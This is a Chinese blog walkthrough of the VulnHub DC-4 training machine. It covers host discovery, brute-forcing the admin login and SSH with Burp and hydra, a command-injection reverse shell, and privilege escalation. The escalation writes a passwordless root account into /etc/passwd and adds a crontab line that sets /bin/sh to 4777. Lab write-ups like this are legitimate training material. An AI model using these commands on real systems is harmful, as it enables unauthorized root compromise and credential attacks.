DC靶机系列------4

最新推荐文章于 2024-08-09 09:21:14 发布
最新推荐文章于 2024-08-09 09:21:14 发布
阅读量122 收藏
点赞数
分类专栏: # 靶机实战 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ppbgi/article/details/117338447
版权

进行基本的信息收集

  • 进行目标ip的搜集:
arp-scan –interface eth0 192.168.1.0/24

在这里插入图片描述

  • 进行目标端口的检测:
    在这里插入图片描述

  • 发现80端口,进行目标的访问:

在这里插入图片描述
然后利用BP来对admin进行密码的爆破:用户名:admin 密码:happy
在这里插入图片描述
在这里插入图片描述

发现存在命令执行漏洞

  • 进行漏洞利用:

使用nc进行shell的反弹
在这里插入图片描述

在目标靶机中进行信息收集

  • 使用python打开交互式提示符
python3 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

  • 开始进行目标的信息收集:
whoami

在这里插入图片描述
在这里插入图片描述

  • 进行有效信息的搜索与查看:

在这里插入图片描述

在这里插入图片描述

  • 发现了一堆密码,利用hydra来进行用户密码的爆破:
touch username.txt  //将三个用户放入
touch DC4passwd.txt //将所有密码导入
hydra -L username.txt -P DC4passwd.txt -t 6 ssh://192.168.1.66 //开始爆破

在这里插入图片描述
在这里插入图片描述

  • 进行Jim用户的登录:

在这里插入图片描述
登录时提示有邮件,进行查看:

在这里插入图片描述
发现用户charles密码:
在这里插入图片描述
登录charles用户:
在这里插入图片描述

提权

  • 进行权限的查看:
sudo -l
find / -perm  -u=s  -type f 2>/dev/null

在这里插入图片描述

在这里插入图片描述

  • 创建用户拥有root权限
echo "ac::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

用户名:密码:uid:gid:属组:家目录:解释器

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

权限提升

  • 利用teehee可以向任意文件写入的特性,向crontab中写入定时任务
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
//时间部分全部填写为*,默认这个定时任务每分钟执行一次。通过执行的脚本将 /bin/sh 的权限修改为4777,这样就可以在非root用户下执行它,并且执行期间拥有root权限。

在这里插入图片描述
在这里插入图片描述
参考文章:https://laosec.cn/2021/05/12/%e9%9d%b6%e6%9c%ba%e7%b3%bb%e5%88%97-dc_4/
参考文章:https://blog.csdn.net/qq_41901122/article/details/103802994

Hero.Youth
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
DC4靶机
qq_40646572的博客
04-29 300
靶机信息搜集 发现DC4靶机是192.168.220.208,DC4靶机开启端口是22,80端口。 防止端口信息遗漏,扫描全部端口,nmap默认扫描端口0-1000。 端口扫描完成后,使用nmap脚本漏洞扫描。发现没有可以利用的漏洞。 尝试对靶机进行攻击 打开80端口的http服务,查看目标主机网站是否存在可以打穿到后台的漏洞。 首先进行目录扫描。 未搜集到任何可以利用的信息。。。 下面有两种思路,一种尝试sql注入,另一种,爆破http登录或者ssh爆破。 先尝试sql注入,失败。。。。 下.
vulnhub之DC4靶机
LainWith的博客
08-15 1080
靶机概览信息收集nmap信息收集爆破后台使用字典爆破登进后台命令注入漏洞敏感信息收集SSH爆破SSH登录提权创建一个管理员以管理员身份登录 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-4,313/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC3的MAC,这样做主机发现时可以通过.
DC靶机渗透-DC4
weixin_41607190的博客
12-20 1771
设置成nat模式 发现主机 arp-scan -l #对局域网内的每个主机发送arp包,存在主机就会返回arp响应 端口扫描,看开启了哪些服务(端口对应服务)
vulnhub系列靶机--DC4
cyzCc的博客
02-23 798
vulnhub系列靶机DC4 1.使用nmap扫描主机ip nmap -sP 192.168.211.1/24 目标靶机的ip为192.168.211.137 2.扫描目标靶机开放的端口服务 nmap -A 192.168.211.137 -p 1-65535 目标靶机开放了22端口和80端口 我们在浏览器上访问80端口 发现一个admin登录框 尝试使用burp爆破,首先找到kali里面...
vulnhub靶机DC4
weixin_52450702的博客
11-02 625
dc-4靶机ip:192.168.70.163靶机下载地址:https://download.vulnhub.com/dc/DC-4.zip.torrent。
Vulnhub靶场----4、DC-4
七天
02-22 949
Vulnhub-DC4
靶机渗透练习72-DC4
hirak0的博客
04-21 1693
靶机描述 靶机地址:http://www.vulnhub.com/entry/dc-4,313/ Description DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily for beg
DC-4靶机渗透详细教程(附靶机链接)
bwt_D的博客
03-01 5917
靶机链接:https://pan.baidu.com/s/1Bcy6_fOXj4ysZTcBIUOxpw 提取码:eefe 首先查看kali虚拟机的ip地址 ifconfig 可以看到我们kali的虚拟机ip为192.168.159.145 接着使用nmap工具进行扫描,获取靶机的IP地址 nmap -sP 192.168.159.2/24 打开靶机的虚拟机设置,选择网络适配器-高级,查看我们靶机的mac地址。与扫描的结果匹配,发现靶机的IP为192.168.159.142 继续使用namp对靶
DC-4靶机
mlws1900的博客
03-24 1031
下载不下来用迅雷下载。
DC-4靶机渗透测试
qq_60463414的博客
07-07 2380
DC4靶机shell反弹,提权流程。
DC4-靶机
Au
08-25 3516
下载地址 配置的环境: kali:192.168.25.131 DC4 -靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.134,判定为DC3-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.168.2...
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4610
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
【vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1929
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
渗透测试学习之靶机DC-4
xdbzdgx的博客
11-18 3690
1.下载靶机 本篇文章是DC靶机系列的第四篇,针对的是靶机DC-4,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-4的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-4只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到ro
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1441
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
兼顾智能安全,医疗电子与AI如何打通?
bigbit_LiLi的博客
08-07 917
虽然目前光子计数技术仍在开发的过程中,但我们有理由相信,在不久后的将来,随着技术的进一步发展和应用拓展,光子计数有望在全球范围内得到更广泛的应用,为人类健康事业的发展做出更大的贡献。安森美耕耘医疗行业已经有三十多年的历史,例如在专业助听器的产品化落地中,安森美解决方案集成了多核处理器、先进的音频处理算法、低功耗蓝牙模块和丰富外围接口的系列核心产品,能够实现卓越的音质、长电池寿命和无线连接功能,帮助助听器制造商打造出高质量、智能化的助听器产品,显著提升用户的听觉体验。未来,医疗电子控制器肯定会国产化。
某通电子文档安全管理系统 CDGAuthoriseTempletService1接口SQL注入漏洞复现 [附POC]
最新发布
薛定谔嘚喵博客
08-09 538
某通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的POST 请求注入恶意 SQL代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
应急响应-主机安全之系统及进程排查相关命令(Linux操作系统-初级篇)
关注网络安全、云原生安全
08-07 1137
本文介绍下在应急响应过程中,linux系统下排查系统、进程、服务可能用到的命令,有些命令选项很多,读者可以仅看常用选项。不涉及内存、进程注入、rootkit等高级攻击的排查。常用-n参数,n为展示的数量systemctl命令 是系统服务管理器指令,它实际上将 service 和 chkconfig 这两个命令组合到一起。任务旧指令新指令使某服务自动启动使某服务不自动启动检查服务状态systemctl status httpd.service (服务详细信息)
某赛通电子文档安全管理系统 CDGAuthoriseTempletService1 SQL注入漏洞复现(XVE-2024-19611)
0xSec
08-08 704
某赛通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值